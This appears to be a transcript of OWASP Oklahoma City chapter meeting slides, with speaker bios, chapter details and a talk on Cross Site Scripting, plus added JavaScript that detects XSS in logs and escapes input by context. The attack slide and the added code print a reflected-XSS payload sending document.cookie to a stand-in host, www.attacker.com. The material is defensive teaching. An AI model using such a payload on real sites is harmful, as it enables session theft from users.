The OWASP Oklahoma City Chapter features experts like Joe Sullivan, Jim Thavisouk, and Stacy Dunn who are dedicated to improving software security. They focus on web application security, offer valuable resources like the OWASP Top 10, and provide a platform for knowledge sharing and networking. Join their events, learn about common security risks like Cross Site Scripting, and contribute to the global mission of enhancing software security.
Welcome!
• Thanks to our sponsors!
• OWASP
• RCB Bank
• Crossroads Information Security

Joe Sullivan
• Started in Infosec with a web hosting company in 1999
• Started one of the first outsourced support companies for web hosting servers in 2000
• Worked for an ecommerce company for 10 years in network security
• Currently CISO for RCB Bank
• 1 to 1 Risk Control & Investigations – Owner/Lead Investigator
• Consulting for Crossroads Information Security
• SANS Mentor SEC504 Hacker Tools, Techniques, Exploits, and Incident Handling

Jim Thavisouk
• Jim Thavisouk is currently working at GitLab as their Senior Security Automation Engineer.
• He has been working closely with automating security in the cloud for the past two years. Before GitLab, he worked with various government agencies, including the Department of Defense and the Department of Energy, where he focused on vulnerability research against a variety of technologies.
• Jim also holds a Master's Degree in Computer Science from the University of Tulsa's Cyber Corp program.

Stacy Dunn
• OWASP Oklahoma City Chapter Leader
• Information Security Analyst, RCB Bank
• Board Member of Super! BitCon, a local gaming convention.
• Curator and Founder at Oklahoma Artcade.
• Super nerd.

Contact Information
• Joe Sullivan: joe.sullivan@owasp.org
• Jim Thavisouk: jim.thavisouk@owasp.org
• Stacy Dunn: stacy.dunn@owasp.org

Oklahoma City Chapter
• The official page is at: https://www.owasp.org/index.php/Oklahoma_City
• Twitter: @okcowasp
• FaceBook
• YouTube
• MeetUp: https://www.meetup.com/Oklahoma-City-Chapter-Meetup/
• https://owasp.herokuapp.com/ <- Join us on Slack!

OWASP
• The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies and other organizations worldwide. Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.

OWASP Top 10
• The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
• We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.

Membership
• Individual Members support OWASP at the $50 USD* level annually. There is also a 2 year membership for $95 USD* and Lifetime membership for $500 USD*. To find out more about Individual Membership, please visit the Individual Member page.
• Membership is optional
• Meetings are open to everyone
• Guests are welcome
• Memberships help fund our chapter

Meetings
• Web Application Security
• Web Application Development
• Presentations
• Labs
• Networking
• Round Tables
• Food

The Future
• Conferences (IWS Coming Up)
• Speakers
• Presentations
• News
• Challenge Coins
• Promo Materials
• Volunteers are welcome!
Speaking of Presentations
• Cross Site Scripting
• XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications
• Better described as a code reflection attack
• How this works is an attacker crafts a URL with a script in it
• The script in the URL is sent to the server as input
• When the user accesses the URL the server reflects back the script contained in the URL
• The user's browser processes the script and performs whatever action the script was set to run
Cross Site Scripting Attack Scenario
• HTML without validation or escaping:
  (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
• Attacker modifies the CC parameter to:
  '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
• This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.
More Cross Site Scripting Attacks
• Port scanning your internal network using XSS attacks (https://www.symantec.com/connect/blogs/getting-sassy-xss-part-3-port-scanning)
• Attacking log viewers and user interfaces with XSS
• Using the Browser Exploitation Framework (BeEF) to attack browsers: https://www.cybrary.it/0p3n/tutorial-xss-exploitation-beef/
• Using XSS we can steal cookies, scan networks, hook into browsers and do a lot more
• Good for getting a foothold on a network
Detecting Cross Site Scripting Attacks
• This is a noisy attack
• Generates logs
• SIEM can detect attacks, but may miss obfuscation techniques
• IPS can alert to XSS attacks
• IDS can alert to XSS attacks
• Web application firewall
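The "may miss obfuscation techniques" point above is easy to see in code. The following is an added example, not from the slides or from OWASP: a small log-side detector run over constructed access-log lines in combined log format. A rule that matches indicators against the raw log text catches the slide's plain payload but misses the same payload once it is URL-encoded or double-encoded; normalising the request target before matching recovers both. The indicators, the log lines and the IP addresses are all constructed for the example.

```javascript
// Added example, not from the slides: a log-side detector for reflected-XSS
// probes, run over constructed access-log lines (combined log format).
// It shows why a rule matching raw log text misses URL-encoded and
// double-encoded payloads, and how normalising first recovers them.

// Constructed sample log lines. Line 2 carries the slide's own payload,
// line 3 a <script> payload URL-encoded, line 4 the same one double-encoded.
const SAMPLE_LOGS = [
  '203.0.113.10 - - [12/Mar/2019:10:01:02 -0500] "GET /account?CC=4111111111111111 HTTP/1.1" 200 512',
  '203.0.113.11 - - [12/Mar/2019:10:01:05 -0500] "GET /account?CC=\'><script>document.location=\'http://www.attacker.com/cgi-bin/cookie.cgi?foo=\'+document.cookie</script> HTTP/1.1" 200 640',
  '203.0.113.12 - - [12/Mar/2019:10:01:09 -0500] "GET /account?CC=%27%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 640',
  '203.0.113.13 - - [12/Mar/2019:10:01:12 -0500] "GET /account?CC=%2527%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 640',
];

// Indicators taken from the slide's attack scenario. A production SIEM rule
// set is broader; the normalisation step is the point of this example.
const INDICATORS = [/<script\b/, /document\.cookie/];

// Request line inside the log entry: method, target, protocol.
const REQUEST_RE = /"(?:GET|POST) (\S+) HTTP\/[0-9.]+"/;

// Pull the request target (path + query string) out of a log line.
function requestTarget(line) {
  const m = REQUEST_RE.exec(line);
  return m ? m[1] : '';
}

// Percent-decode until the string stops changing, bounded to three rounds so
// hostile input cannot keep us looping; then lower-case for matching.
function normalise(target) {
  let out = target;
  for (let i = 0; i < 3; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(out);
    } catch (e) {
      break; // malformed %-sequence: stop decoding and match what we have
    }
    if (decoded === out) break;
    out = decoded;
  }
  return out.toLowerCase();
}

// Naive rule: indicators against the raw (lower-cased) log line.
function naiveMatch(line) {
  const raw = line.toLowerCase();
  return INDICATORS.some((re) => re.test(raw));
}

// Normalising rule: decode the request target first, then match.
function normalisedMatch(line) {
  const target = normalise(requestTarget(line));
  return INDICATORS.some((re) => re.test(target));
}

// Return the source IPs of every line the given matcher flags.
function scanLogs(lines, matcher) {
  return lines.filter(matcher).map((line) => line.split(' ')[0]);
}

console.log('naive      :', scanLogs(SAMPLE_LOGS, naiveMatch));
console.log('normalised :', scanLogs(SAMPLE_LOGS, normalisedMatch));
```

The naive rule flags only 203.0.113.11; the normalising rule also flags .12 and .13. The decode loop is bounded on purpose: an unbounded "decode until stable" loop is itself a denial-of-service surface on a busy log pipeline.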
Preventing Cross Site Scripting
• Filter out meta characters from requests – do this on the server side, and not the client side
• Microsoft offers a free anti-XSS library
• Use frameworks that automatically escape XSS by design, such as the latest Ruby on Rails or React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered.
• Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet 'XSS Prevention' has details on the required data escaping techniques.
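To tie the attack scenario slide to the "escape based on context" advice, here is an added example that is not from the slides or from OWASP: the slide's vulnerable Java line re-created in Node.js, beside a version that escapes the CC parameter for the HTML attribute context it lands in, plus the escaper you would use instead if the same value were written into a JavaScript string inside a <script> block. The `request.getParameter("CC")` call is replaced by a plain string argument, and the escaping rules follow the OWASP XSS Prevention Cheat Sheet (entity encoding for HTML body/attribute, \xHH encoding for JavaScript strings).

```javascript
// Added example, not from the slides: the vulnerable rendering from the
// attack-scenario slide, re-created in Node.js, beside a context-escaped
// version. The servlet request object is replaced by a string parameter.

// The attacker-supplied CC value from the slide's attack scenario.
const ATTACK_CC = "'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'";

// Vulnerable: untrusted input concatenated straight into a quoted attribute.
// The leading '> closes the attribute and the tag, so <script> becomes live HTML.
function renderVulnerable(ccParam) {
  return "<input name='creditcard' type='TEXT' value='" + ccParam + "'>";
}

// HTML body / attribute context (OWASP XSS Prevention rules 1 and 2):
// entity-encode the characters that can end text or break out of a quoted
// attribute. Quoting the attribute in the template is still required.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// JavaScript string context (rule 3): \xHH-escape everything except
// [A-Za-z0-9], so no character can close the string literal or the
// surrounding <script> block. Only use inside a quoted JS string.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Fixed: identical markup, parameter escaped for the attribute context.
function renderSafe(ccParam) {
  return "<input name='creditcard' type='TEXT' value='" + escapeHtml(ccParam) + "'>";
}

// Count tag openers in the output. The safe rendering must contain exactly
// one (the <input> itself); the vulnerable one also has <script> and </script>.
function countTags(html) {
  return (html.match(/</g) || []).length;
}

console.log(renderVulnerable(ATTACK_CC));
console.log(renderSafe(ATTACK_CC));
console.log(escapeJsString(ATTACK_CC));
```

The two escapers are not interchangeable: `escapeHtml` output placed inside a JavaScript string is still injectable, and `escapeJsString` output placed into an attribute is wrong for that context. Pick the escaper by where the value lands, which is the slide's point about body, attribute, JavaScript, CSS and URL contexts.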
Preventing Cross Site Scripting
• Web application penetration tests regularly
• Test when changes are implemented to the web application
• Test when new attacks come out
• Work with your web application developer on testing and remediation
Discussion
• What would you like to get out of our meetings?
• Web Application Security
• Vulnerability Testing and Remediation
• Development
• Security Operations
• Penetration Testing
• Incident Response
• Defending Web Applications